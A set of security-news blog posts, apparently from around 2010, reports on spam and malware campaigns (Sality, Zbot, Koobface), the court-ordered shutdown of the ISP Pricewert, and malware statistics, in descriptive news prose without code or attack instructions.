Security experts have issued a warning about a new spam campaign using PDFs to spread malware. The email arrives with what looks like a note from a friend:

          “Hey man… Remember all those long distance phone calls we made. Well I got my telephone bill and WOW. Please help me and look at the bill see which calls where yours ok…”

The “bill” is attached to the email as “PhoneCalls.pdf” and if clicked on, takes advantage of vulnerability in Adobe Reader in order to download the Sality virus. This virus, which appears to have originated in Russia, is extremely dangerous. It takes over the autorun feature, installs a peer to peer connection to a botnet, downloads additional malware, looks for and disables any anti-virus software it finds, looks for and infects any local, remote, and removable drives, alters the Windows registry to infect any .exe file set to load on startup, and worst of all, damages every file it infects beyond repair. It is one of the nastiest viruses out there today. Its botnet contains over 100,000 computers.

Adobe says they have released an update that repairs the vulnerability and if your IT department hasn’t installed it they should ASAP, but neither that nor having the most recent version of the program are guarantees against getting infected. Sality has been around since 2003 and has grown more and more complex and sophisticated with no end in sight. It’s important to have an anti-virus solution that can block zero-day attacks and threats.

A U.S. district court judge in California has forced a shady ISP out of business.  On April 8^th, Judge Ronald Whyte ordered the sale of all assets belonging to Pricewert, also known as 3FN.net.  He also ordered the company to forfeit over $1 million in profits to the FTC, profits he says were gained through illegal activity.  Security experts helped make the case against them.

          Whyte wrote in a disgorgement order. “These experts had analyzed data derived from internet searches which establish that defendant, an internet service provider, was engaged in widespread illegal activity, there seems to be little doubt from the information provided that Pricewert functioned primarily as an internet service provider for illegal activity.”

Pricewert has long been known as an ISP that catered to spammers, malware distributors and child pornographers, so news of its closure was cause for celebration by many.  The FTC claimed that by providing services to botnet herders and spammers was an unfair business practice.  Whyte agreed and issued a restraining order against them last year, barring the any upstream provider or data center from providing service to them.

The FTC alleges that Pricewert blatantly ignored take down orders and ran its own botnets for which it actively recruited herders for. Transcripts of IM chats show the employees discussing those botnets with several botnet herders, and officials say nearly 5,000 different types of malware  were controlled by those botnets.

The company fired back, accusing the FTC of blaming them for the actions of their customers  but the agency says that only a tiny percentage of the company’s customers were legit .

Malware has gone from being a mere nuisance to being a thriving underground business that rakes in millions for cybercriminals. New varieties and variants are being developed everyday. Here’s a look at some of the viruses and malware that will go down in history as being some of the worst:

1. Autorun- This virus hit USB thumb drives and other removable storage devices with a vengeance. Once an infected drive was plugged in the virus looked for a network and if one was found, used it to spread itself to every other computer attached to it. Autorun destroyed data on millions of computers.

2. Sasser – This virus targeted Windows XP and Windows 2000 users and hit the corporate world hard. It forced businesses around the world including the German postal system, several U.S. airlines and a top French news agency to shut down or experience massive delays and foul ups. It spread by scanning IP addresses.

3. Klez- This one used email spoofing to spread like wildfire. Once it infected a computer it disabled any anti-virus program it found.

4. Storm- Distributed by one of  the most massive botnets in history, Storm exploited headlines and current events to spread itself. It got its name from the very first spam mails it sent out, which included a link that claimed to lead to exclusive footage of the severe storms pounding Europe at the time.

5. SQL Slammer- This virus pounded both the U.S.and South Korea, damaging the systems of many banks, airlines, and other businesses as well as some government agencies. Within 10 minutes of being unleashed on the net it had infected 75,000 computers.

Here’s a look at what are considered the top 7 malware threats today, in order:

7. Koobface - This virus has been pounding the net, especially social networking sites, for quite a while now.  Upon infection it floods the user with rogue pop up ads and takes over the user’s email account, using it to send out links to itself and other malware. This could be a nightmare if one or more of the computers on your corporate network were to be infected. Malicious emails sent from your company’s domain would be a PR disaster.

6. DoubleD - This is adware that is often found bundled in with freeware or shareware or lurking on bittorents. It delivers rogue pop ups and hijacks the browser, redirecting it to spam and porn sites.  If your employees are allowed to install software (they probably shouldn’t be!) make sure to impress upon them the importance of downloading from legit sites and scanning files before installing them!

5. TDSServ - This is a popular rootkit used by hackers to conceal their malware.  It also scans the system for passwords and other personal info and sends them back to the hacker, and it can take over any email accounts found on the system and send out spam and copies of itself.

Continue reading Today’s Top 7 Malware Threats»

A new type of malware distributes itself by silently overwriting the update function for popular applications like Flash and Adobe Acrobat. While malware masquerading as software updates is very common, this is the first time it’s been seen overwriting the auto update functions of legitimate software. Written in Visual Basic and called W32.Fakeupver.trojan, it looks exactly like a legit updater right down to the version number and updater-in fact it’s so convincing that even anti-virus software is fooled.

Once installed it opens DHCP and DNS clients along with a network share and port in order to communicate with its command server and presumably adds the system to a botnet.

What makes the malware particularly dangerous is that once the malware is detected and removed, it leaves the legitimate app it infected without its auto update feature, and that could leave it vulnerable to future attacks if it’s left unable to download critical updates. The user would have to completely re-download and reinstall the affected software, and likely wouldn’t know they had to.

Since many software apps like Adobe, Java, Flash, and Windows itself receive near constant updates and patches, having the update function removed could be disastrous. Scammers have exploited Flash, and Java many times and malicious PDFs are a popular distribution method. 56% of all malware currently comes from malicious PDFs. Experts recommend disabling Javascript when visiting unfamiliar websites to help protect yourself, but an even better idea is to avoid visiting unfamiliar websites all together. It’s also a good idea to manually check your apps on a regular basis to make sure they’re properly updated.

An add-on program that allegedly infected the computers of 4000 users of the Firefox Web browser was clean and malware free, according to the maker of the application.

According to Sothink Software, the add-on, Web Video Downloader 4.0, was misidentified as a malware carrier due to a compression utility called Armadillo embedded in Sothink’s offering. The utility is often used by crackers to compress and hide malicious code in malware, the company explained. “That’s the reason why the [virus] scans are hitting on the file as suspicious,” it said, “[T]here isn’t any virus in Web Video downloader or in Armadillo….”

The company added that it hasn’t used Armadillo in the software for quite some time and that the latest release of the add-in, version 5.7, has been certified clean and safe by Virustotal, an independent virus detection service.

The Video Downloader add-on is a free program that allows a user to capture from Firefox Adobe Flash video from Web sites such as YouTube, Google and MSN and save it in a number of formats, including FLV, WMV, ASF, AVI, MOV, RM AND RMVB.

Last week, the Mozilla Foundation, makers of Firefox, removed Video Downloader 4.0, as well as another program called Master Filer, from its add-ons, or AMO, Web site claiming the software was infected with a bad app.

Continue reading Firefox add-on was clean, maker says»

Wednesday’s launch of the highly anticipated Apple iPad has resulted in a spike of Apple related spam. Security researchers say a 30% spike in phishing spam was detected following the announcement as spammers rushed to take advantage of the huge audience looking for info on the device. In addition to phishing spams hawking deals on MacBooks and iPhones, the researchers discovered widespread SEO poisoning designed to lure people searching for terms like “iPad price” or “iPad specs” to malicious sites serving malware, mostly fake anti-virus software.

Security experts are predicting such activities to keep rising as the iPad’s March release date draws closer. They advise users to keep their anti-virus software up to date and to get their Apple news from trusted, familiar sites. Companies should review their site security and keep a close eye on their code as many of the poisoned search results point toward legit sites that have been compromised by SQL injection attacks.

A new report out by security experts says that over 25 million new strains of malware were discovered in 2009, and that number is expected to rise in 2010. Trojans are the most popular type distributed, making up 66% of all malware, followed by Adware at 17%. Adware includes scareware such as fake anti-virus, fake registry cleaners, and fake anti-spyware programs. Viruses, spyware, rootkits and worms make up the remainder.

The report also identified Taiwan (62.20%), Russia (56.77%) and Poland (55.40%) as the countries with the highest levels of malware infected computers and Sweden (31.63%), Portugal (37.79%) and the Netherlands (38.02%) as the countries with the lowest infection levels. The United States is in the middle with about a 50% infection level. Many of these infections may not even be known to the user. Millions of computers have been turned into “zombies” and added to botnets.

Experts say malware attacks will be on the rise and become more and more sophisticated as scammers develop new techniques to avoid detection. Social networking sites will bear much of the brunt as spammers and scammers seek to take advantage of the huge audiences these sites attract. Facebook has 400 million members and Twitter over 15 million in the US alone.

As 2010 continues to unfold stay with All Spammed Up for the latest spam and security news. It’s going to be an interesting year.

Security experts have detected a new phishing campaign that uses fake Microsoft Outlook notifications to spread malware. Over a million of the spam messages have been intercepted by spam and phishing filters since Thursday.

The messages look like an alert from the recipient’s IT department notifying them that a security upgrade is available and asking them to log into their accounts to  retrieve the new settings. The link in the messages leads to a fake Outlook Web Access page which asks them to download a file containing the new security settings. The file is actually an .exe containing the Zbot banking Trojan.

What sets this spear phishing attack apart from past ones is the sheer volume of messages being sent out and the fact that the messages are highly personalized to each domain they are sent to.

In a related attack, search engine results for “office.microsoft.com” have been poisoned with pages leading to fake anti-virus software sites. 2010 has kicked off with a bang for malware distributors, hackers, and spammers. They are growing more and more sophisticated everyday, meaning 2010 could be a record year for attacks.

A security researcher recently discovered a new malware attack that has poisoned nearly 300,000 websites. The SQL attacks began last month and use a hidden iframe to redirect visitors to a malicious site that is programmed to look for and exploit known vulnerabilities in several different apps including Adobe Flash, ActiveX, IE, and several other Microsoft applications. If found, a rootkit called Backdoor.Win3.Buzus.croo is installed. This malware steals banking information and likely downloads even more malware to the infected system. It’s believed to be related to the Rustock botnet.

Rustock, along with Cutwail, Zeus and Mega-D, control over 5 million computers and send out billions of spam messages. The shutdowns of cybercrime friendly ISPs McColo and Real Host have done little to stop them-in fact current spam levels have exceeded pre-McColo ones. Experts say botnet herders no longer rely on a single ISP or domain so that if a shut down happens they will be back up in hours instead of weeks or months.

Experts say those with properly updated and patched systems are in no danger so make sure all your users are protected.